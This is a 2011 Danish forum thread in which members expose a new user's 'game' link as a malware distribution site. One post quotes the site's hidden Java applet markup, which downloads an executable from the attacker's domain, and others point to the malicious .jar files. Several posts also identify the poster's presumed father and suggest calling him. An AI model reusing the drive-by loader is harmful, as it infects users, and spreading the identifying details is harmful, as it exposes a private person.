mboost-dp1

Prøv mit nye Newz.dk-spil


Gå til bund
Gravatar #1 - jespergreen10000
6. dec. 2011 21:44
Hvad synes I om det spil jeg har lavet:
<link slettet, red.>

Det kræver at man har Java installeret :)

God fornøjelse!
Gravatar #2 - tormok
6. dec. 2011 21:59
http://www.malwarepatrol.net/cgi/search.pl?id=247394 skrev:
Malware found Trojan.Win32.VBKrypt.hevr
Insertion date 02:07:02 18/Oct/2011 UTC
URL http://dowload.dk/<sanitized>

Gravatar #3 - jespergreen10000
6. dec. 2011 22:15
Det er ik virus.
Det er en del af spillet.
Gravatar #4 - Kolklik
6. dec. 2011 22:16
#1 & 3
nice try.

Ingen vil tro på dig når du er helt ny på forum.
Oprettet:
6. dec. 2011 22:34
Aktiveret:
6. dec. 2011 22:35
Gravatar #5 - Qw_freak
6. dec. 2011 22:19
jespergreen10000 (1) skrev:
Hvad synes I om det spil jeg har lavet:
<link slettet, red.>

Det kræver at man har Java installeret :)

God fornøjelse!


FUCKTARD....

Er du en af de der forsmåede WoW sælgere, eller AK47 der tuder lidt...??
Gravatar #6 - Bachy
6. dec. 2011 22:21
Han huserer også i "Tråden til dumme pørgsmål" med samme link ...

Sikke en skovl ...
Gravatar #7 - EllMarto
6. dec. 2011 22:21
Øv! Troede lige der var en som rent faktisk HAVDE lavet et spil om Newz. Glædede mig til at se hvad det gik ud på, og hvem fra forummet man kunne spille som.
Gravatar #8 - tormok
6. dec. 2011 22:26
http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=212.97.132.199 skrev:
url http://dowload.dk...
virusname
Exp/JS.Pidief.psb
Worm/Win32.WBNA
HTML:FBJack-A Trj


Er Martin din far?
http://www.krak.dk/profil/martin+green+jakobsen/37...
Gravatar #9 - Alrekr
6. dec. 2011 22:34
tormok (8) skrev:
http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=212.97.132.199 skrev:
url http://dowload.dk...
virusname
Exp/JS.Pidief.psb
Worm/Win32.WBNA
HTML:FBJack-A Trj


Er Martin din far?
http://www.krak.dk/profil/martin+green+jakobsen/37...


Man kunne ringe til ham for at spørge? :)

"Ja goddav Martin. Har du en søn der hedder Jesper? Jo ser du, han forsøger at få uskyldige brugere af et internetforum til at hente noget virus, og vi ville sætte pris på hvis det blev taget væk. Jo, altså, hvis han ikke gør det, så må vi jo gå til politiet."
Gravatar #10 - Kolklik
6. dec. 2011 23:55
#9 oh please make the call! :)
Gravatar #11 - Lowkey
7. dec. 2011 00:12
Han er garanteret ikke ret gammel, for telefonnummeret på DK-Hostmaster står registreret til hans far(?)

Han betragter tilsyneladende sig selv som værende en ret 1337 h4x0R, for han prøver også at sprede malware gennem sin youtube kanal: http://www.youtube.com/user/jespergreen1000
Gravatar #12 - Lusk
7. dec. 2011 07:25
Ifølge netstationen er domænet hosted af surftown. De vil hurtigt kunne lukke det ned hvis det meldes

Gravatar #13 - Lusk
7. dec. 2011 07:35
Lowkey (11) skrev:

Han betragter tilsyneladende sig selv som værende en ret 1337 h4x0R, for han prøver også at sprede malware gennem sin youtube kanal: http://www.youtube.com/user/jespergreen1000


Prøv at se forskellen i hvad der står i de kommentarer der er fra 24/3 og resten :-) han bruger alle de klassiske tricks for at lokke folk ser det ud til. Men det værste er der ser ud til at være nogen der bidder på.

Har ikke selv tid lige nu, men hvis nogen har tiden kunne det være sjovt at se hvad vi kan få ud af de brugernavne der kommenterer 24/3 for det må kunne give mere på Jesper...
Gravatar #14 - PHP-Ekspert Thoroughbreed
7. dec. 2011 08:09
May the Newz be with you!...

Fjols - troede lige arbejdsdagen ville blive sjovere ... Derp
Gravatar #15 - XorpiZ
7. dec. 2011 08:43
Lusk (12) skrev:
Ifølge netstationen er domænet hosted af surftown. De vil hurtigt kunne lukke det ned hvis det meldes


Jeg har sendt en mail til [email protected].
Gravatar #16 - Lowkey
7. dec. 2011 09:36
Hvis der er nogen der har en sandbox de kan teste i, kunne det være interessant at se hvad de trojans gør.
At inficere folk er jo kun første skridt. Det er ikke til at sige hvad næste trin i planen er.

Er der nogen der er haj til den slags?
Gravatar #17 - Lusk
7. dec. 2011 09:39
Lowkey (16) skrev:
Hvis der er nogen der har en sandbox de kan teste i, kunne det være interessant at se hvad de trojans gør.


Jeg har et VMWare setup jeg kan lege med. Jeg prøver at se om jeg kan få tid til at smide en server op på sit eget net senere i dag
Gravatar #18 - Ronson ⅍
7. dec. 2011 10:05
#16: Jeg er ret sikker på han har huseret på HOL også. dowload.dk siger mig et eller andet i hvert fald.
Gravatar #19 - nlsn
7. dec. 2011 10:50
#18 Korrekt. Jeg smed den .exe fil op som lå/ligger på dowload.dk i en online sandbox, men der var ingen aktivitet. Muligvis fordi den ikke blev triggered inden testen fik timeout.
Der blev taget kontakt til Surf-towns abuse, men eftersom siden stadig er fint aktiv, kom der vist ikke en skid ud af det.

Der lå en txt-fil på siden, som indeholdt en log over hvilke maskiner der havde downloadet og aktiveret programmet. Det var primært belgiske IP'er af en eller anden årsag, og en søgning på opbygningen af loggen, gav et indtryk af noget interface fra en vist nok oprindeligt russisk udviklet botnet-orm.

Går ud fra, at det resultatet af noget custom malware-kit, som han forsøger at lave sit eget lille botnet med.

Anywho, Jesper Green er en nederen lille lårt.
Gravatar #20 - Kolklik
7. dec. 2011 10:50
google søgning på urlen med virus giver et hit på

http://www.google.dk/url?sa=t&rct=j&q=%22h...

som har en masse tekst (har ikke lige gidet at gå ind ;))

men fra googles "oversigt" er der dog dette.

... 212.97.132.199 http://dowload.dk/1/pdf.php 207.171.163.216 http://dl02.s3.amazonaws.com/installers/250985/Duk... 76.73.96.194 ...


Tyder på det er en pdf svaghed han prøver at udnytte.
Eftersom chrome har deres egen pdf viewer indbygget i deres sandkasse, burde chrome brugere vel i teorien kunne gå der ind uden nogle bekymringer?

tanke eksperiment.
Gravatar #21 - onetreehell
7. dec. 2011 11:01
Fra pdf'en:
<</Creator (Adobe)
/Title 5 0 R
/Producer (Notepad)
/Author (Miekiemoes)
/CreationDate (D:20080924194756)
>>

hvor er den trojan I snakker om?
Gravatar #22 - Alrekr
7. dec. 2011 11:02
#21
Den trojan blev fundet af #2 og #8. Dertil er det bare en meget skummel side.
Gravatar #23 - Alrekr
7. dec. 2011 11:05
file:C:\Users\[mig]\AppData\Local\Temp\jar_cache6370036182727130983.tmp

Den fil triggede MSE, og fandt TrojanDownloader:Java/OpenConnection.A
Gravatar #24 - onetreehell
7. dec. 2011 11:07
Øv, jeg får ikke nogen trojan :( Jeg får kun en side der ligner en borken http-header:

X-Powered-By: PHP/5.2.0 Content-type: text/html ?>X-Powered-By: PHP/5.2.0 Content-type: text/html ?>X-Powered-By: PHP/5.2.0 Content-type: text/html ?>
Gravatar #25 - Alrekr
7. dec. 2011 11:12
Den kommer også her. Du kan lige se hele kildekoden: http://pastebin.com/XbmpfDaN
Gravatar #26 - apkat
7. dec. 2011 11:14
Alrekr (9) skrev:
tormok (8) skrev:
http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=212.97.132.199 skrev:
url http://dowload.dk...
virusname
Exp/JS.Pidief.psb
Worm/Win32.WBNA
HTML:FBJack-A Trj


Er Martin din far?
http://www.krak.dk/profil/martin+green+jakobsen/37...


Man kunne ringe til ham for at spørge? :)

"Ja goddav Martin. Har du en søn der hedder Jesper? Jo ser du, han forsøger at få uskyldige brugere af et internetforum til at hente noget virus, og vi ville sætte pris på hvis det blev taget væk. Jo, altså, hvis han ikke gør det, så må vi jo gå til politiet."


Kunne være sjovt nok at ringe, men tror i virkelig han er så dum at bruge sit rigtige navn til at sprede vira?
Gravatar #27 - trylleklovn
7. dec. 2011 11:19
#26 Hans brugernavn er samme navn som domænet er registreret i, som er på samme adresse, som en anden person ved navn martin green bor.

Hvis det ikke er hans navn, kunne det selvfølgelig tænkes han bare har registreret domænet til en adresse, der ikke er hans, men dem der bor der ville i så fald nok undre sig lidt når de får brev fra dk-hostmaster om at de har oprettet domænet.

Domænet er registreret den 8 september, så who knows. Umiddelbart synes jeg det lyder som om at han rent faktisk er så dum.
Gravatar #28 - onetreehell
7. dec. 2011 11:26
#25
Jeg får *KUN* det som jeg pastede. Jeg kiggede på source, og det var det eneste.

Den der load.exe er vist noget visual basic. Den har åbenbart engang heddet done.exe.

Hvor finder man java malwaren? Jeg vil gerne decompile den \o/
Gravatar #29 - Alrekr
7. dec. 2011 11:32
#28
Åben siden i Firefox.
Gravatar #30 - onetreehell
7. dec. 2011 11:33
#29
Still the same.

Jeg tror muligvis det er pga. operativsystemet.
Gravatar #31 - Alrekr
7. dec. 2011 11:40
Win7 64 bit her.
Gravatar #32 - XorpiZ
7. dec. 2011 11:58
onetreehell (30) skrev:
#29
Still the same.

Jeg tror muligvis det er pga. operativsystemet. 



<Applet Code="Update.class" archive="Update.jar" width="0" Height="1">
<PARAM NAME="name_of_the_file"    VALUE="temp.exe">
<PARAM NAME="path_to_url"    VALUE="http://dowload.dk./1/load.php?spl=javad">
</applet>
Gravatar #33 - Lowkey
7. dec. 2011 11:58
#18

Ja, det var midt i oktober, så vidt jeg husker.

#28

Det er flamenko.jar og Update.jar der begge ligger i dowload.dk/1/
Kig her: view-source:http://dowload.dk/test/watch.php
og view-source:http://dowload.dk/1/index.php
Gravatar #34 - onetreehell
7. dec. 2011 12:24
Nogen der kan give mig et direkte link til *.jar filerne? Jeg kan ikke få det til at virke...
Gravatar #35 - PHP-Ekspert Thoroughbreed
7. dec. 2011 12:37
Er der snart nogen der ringer? Vil vide hvad der sker fremover :D
Gravatar #36 - EllMarto
7. dec. 2011 14:46
Hvis vira'en er en exe fil så er det vel sikkert at benytte linket fra en mac?
Gravatar #37 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #38 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #39 - tonerosetta
7. dec. 2011 16:39
[b][url=http://www.paydollar.com.cn/]
Gravatar #40 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #41 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #42 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #43 - tonerosetta
7. dec. 2011 16:39
<spam slettet - red.>
Gravatar #44 - starn
7. dec. 2011 16:43
#36, ja der burde det. Men hvis den bruger java som drive-by, kan du godt ende med filen på din comp. Men den vil så ikke kunne køres :)

PS: Så kom der vist lige en spam bot ind, som fik fyret en hel del indlæg af... :/

Gravatar #45 - Kolklik
7. dec. 2011 17:05
Dejligt med en gang spam.

Især den slags som giver ingen mening what so fucking ever!

Anyways, som andre også er inde på kunne det være sjovt at decompile de jar filer og se om ikke der ligger noget godt info :)
Gravatar #46 - csstener(^,^)
7. dec. 2011 17:27
http://www.youtube.com/user/jespergreen1000

Skulle vi ikke alle sammen rapportere hans lille lorte profil?? så han mister hans YT bruger
Gravatar #47 - starn
7. dec. 2011 18:22
#45, jeg tror desværre ikke der står noget om ham gutten her i de jar filer. De er sikkert fra et hacker forum som hackforums.net. Der gives disse java drive-by væk, med guides og alt hvad der skal bruges, dog uden en trojan...

Plus der er diverse spreadings guides, som også anbefaler at bruge youtube :/
Gravatar #48 - onetreehell
7. dec. 2011 18:36
#47
Det kunne stadig være interessant at vide hvad den gør.
Gravatar #49 - IT-ekspert Kejser
7. dec. 2011 18:49
Er der blevet ringet???
Gravatar #50 - csstener(^,^)
7. dec. 2011 20:07
#49
ja jeg gjore det..men han trykkede på "Optaget"

Gå til top

Opret dig som bruger i dag

Det er gratis, og du binder dig ikke til noget.

Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.

Opret Bruger Login